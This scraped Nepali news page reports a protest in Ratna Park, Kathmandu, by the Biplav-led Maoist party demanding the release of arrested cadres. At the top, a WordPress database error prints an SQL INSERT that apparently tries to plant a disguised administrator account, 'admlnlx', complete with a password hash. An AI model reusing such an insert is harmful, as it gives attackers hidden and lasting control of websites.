WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZN0ueO1e09LKZdImcty9BK0T0dLpS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:20:49', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१ –
नेत्रविक्रम चन्द विप्लव नेतृत्वको नेकपा माओवादीले आफ्ना कार्यकर्ताहरु छुटाउन माग गर्दै शुक्रबार अपरान्ह रत्नपार्कमा प्रदर्शन गरेका छन् ।
महाधिवेशनको प्रचारप्रसारमा रहेका आफ्ना कार्यकर्तालाई चन्दा उठाएको भनी झुठा मुद्दा लगाएर कारबाही गर्न खोजिएको भन्दै उनीहरुले सरकारविरुद्ध प्रदर्शन गरेका हुन् । माओवादीका दर्जनौं कार्यकर्ताहरु विहीबार काठमाडौंबाट पक्राउ गरेका छन् । पक्राउ परेका विप्लवका कार्यकर्तालाई प्रहरी कार्यालय टेकुमा राखिएको छ ।
विप्लव माओवादीका नेता माइला लामाको नेतृत्वमा निस्किएको जुलुसले रत्नपार्क शान्तबाटिकामा पुगि कोणासभा गरेको छ ।कोणसभामा बोल्दै लामाले महाधिवेशनको प्रचारप्रसारमा रहेका आफ्ना कलाकारहरुलाई चन्दा उठाएको भनी झुठो मुद्दा लगाउने काम गरेको दाबी गरे । पक्राउ परेका कार्यकर्ता तत्काल रिहा नगरे आन्दोलन चर्काउने पनि उनले चेतावनी दिए ।लामाले महंगी, भ्रष्टाचार र कालोबजारीविरुद्धको आफूहरुको आन्दोलन पनि जारी रहने बताए ।